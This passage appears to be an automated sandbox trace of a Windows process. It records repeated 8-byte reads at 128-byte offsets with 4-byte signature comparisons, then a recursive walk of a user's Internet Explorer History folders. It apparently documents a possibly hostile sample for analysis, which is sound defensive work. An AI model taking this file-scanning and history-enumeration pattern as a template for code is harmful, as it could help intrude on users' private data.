lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.886] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.886] SetFilePointer (in: hFile=0xa0, lDistanceToMove=27264, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6a80 [0085.887] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.887] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=27392, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6b00 [0085.887] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.887] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=27520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6b80 [0085.887] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.887] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=27648, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6c00 [0085.887] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.887] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=27776, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6c80 [0085.887] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.887] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=27904, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6d00 [0085.887] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.887] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=28032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6d80 [0085.887] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.887] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=28160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6e00 [0085.887] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.887] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=28288, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6e80 [0085.887] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.887] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.887] SetFilePointer (in: hFile=0xa0, lDistanceToMove=28416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6f00 [0085.887] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.888] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.888] SetFilePointer (in: hFile=0xa0, lDistanceToMove=28544, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6f80 [0085.888] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.888] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.888] SetFilePointer (in: hFile=0xa0, lDistanceToMove=28672, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7000 [0085.888] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.888] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.888] SetFilePointer (in: hFile=0xa0, lDistanceToMove=28800, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7080 [0085.888] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.888] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.888] SetFilePointer (in: hFile=0xa0, lDistanceToMove=28928, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7100 [0085.888] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.888] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.888] SetFilePointer (in: hFile=0xa0, lDistanceToMove=29056, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7180 [0085.888] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.888] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.888] SetFilePointer (in: hFile=0xa0, lDistanceToMove=29184, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7200 [0085.888] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.888] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.888] SetFilePointer (in: hFile=0xa0, lDistanceToMove=29312, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7280 [0085.888] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.888] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.888] SetFilePointer (in: hFile=0xa0, lDistanceToMove=29440, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7300 [0085.888] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.888] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.888] SetFilePointer (in: hFile=0xa0, lDistanceToMove=29568, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7380 [0085.888] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.888] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.888] SetFilePointer (in: hFile=0xa0, lDistanceToMove=29696, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7400 [0085.889] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.889] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.889] SetFilePointer (in: hFile=0xa0, lDistanceToMove=29824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7480 [0085.889] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.889] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.889] SetFilePointer (in: hFile=0xa0, lDistanceToMove=29952, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7500 [0085.889] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.889] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.889] SetFilePointer (in: hFile=0xa0, lDistanceToMove=30080, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7580 [0085.889] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.889] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.889] SetFilePointer (in: hFile=0xa0, lDistanceToMove=30208, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7600 [0085.889] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.889] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.889] SetFilePointer (in: hFile=0xa0, lDistanceToMove=30336, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7680 [0085.889] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.889] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.889] SetFilePointer (in: hFile=0xa0, lDistanceToMove=30464, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7700 [0085.889] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.889] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.889] SetFilePointer (in: hFile=0xa0, lDistanceToMove=30592, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7780 [0085.889] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.889] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.889] SetFilePointer (in: hFile=0xa0, lDistanceToMove=30720, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7800 [0085.889] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.889] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.889] SetFilePointer (in: hFile=0xa0, lDistanceToMove=30848, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7880 [0085.889] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.889] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.890] SetFilePointer (in: hFile=0xa0, lDistanceToMove=30976, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7900 [0085.890] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.890] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.890] SetFilePointer (in: hFile=0xa0, lDistanceToMove=31104, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7980 [0085.890] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.890] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.890] SetFilePointer (in: hFile=0xa0, lDistanceToMove=31232, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7a00 [0085.890] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.890] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.890] SetFilePointer (in: hFile=0xa0, lDistanceToMove=31360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7a80 [0085.890] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.890] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.890] SetFilePointer (in: hFile=0xa0, lDistanceToMove=31488, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7b00 [0085.890] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.890] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.890] SetFilePointer (in: hFile=0xa0, lDistanceToMove=31616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7b80 [0085.890] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.890] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.890] SetFilePointer (in: hFile=0xa0, lDistanceToMove=31744, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7c00 [0085.890] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.890] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.890] SetFilePointer (in: hFile=0xa0, lDistanceToMove=31872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7c80 [0085.890] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.890] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.890] SetFilePointer (in: hFile=0xa0, lDistanceToMove=32000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d00 [0085.890] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.890] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.890] SetFilePointer (in: hFile=0xa0, lDistanceToMove=32128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d80 [0085.890] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.891] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.891] SetFilePointer (in: hFile=0xa0, lDistanceToMove=32256, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7e00 [0085.891] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.891] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.891] SetFilePointer (in: hFile=0xa0, lDistanceToMove=32384, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7e80 [0085.891] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.891] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.891] SetFilePointer (in: hFile=0xa0, lDistanceToMove=32512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7f00 [0085.891] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.891] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.891] SetFilePointer (in: hFile=0xa0, lDistanceToMove=32640, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7f80 [0085.891] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.891] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.891] CloseHandle (hObject=0xa0) returned 1 [0085.891] FindNextFileW (in: hFindFile=0x58e8e8, lpFindFileData=0x288bac | out: lpFindFileData=0x288bac) returned 1 [0085.891] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.891] wcslen (_String="MSHist012017063020170701") returned 0x18 [0085.891] wcscpy (in: _Dest=0x288dfc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0085.891] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x50 [0085.891] wcscat (in: _Dest=0x288dfc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\" [0085.891] wcscat (in: _Dest=0x288dfc, _Source="MSHist012017063020170701" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701" [0085.891] wcscmp (_String1="MSHist012017063020170701", _String2="..") returned 1 [0085.891] wcscmp (_String1="MSHist012017063020170701", _String2=".") returned 1 [0085.891] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned 0x69 [0085.891] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned 0x69 [0085.891] wcslen (_String="*.*") returned 0x3 [0085.891] wcscpy (in: _Dest=0x287f28, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701" [0085.891] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned 0x69 [0085.891] wcscat (in: _Dest=0x287f28, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\" [0085.891] wcscat (in: _Dest=0x287f28, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\*.*" [0085.892] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\*.*", lpFindFileData=0x2881b0 | out: lpFindFileData=0x2881b0) returned 0x591b28 [0085.892] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned 0x69 [0085.892] wcslen (_String=".") returned 0x1 [0085.892] wcscpy (in: _Dest=0x288400, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701" [0085.893] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned 0x69 [0085.893] wcscat (in: _Dest=0x288400, 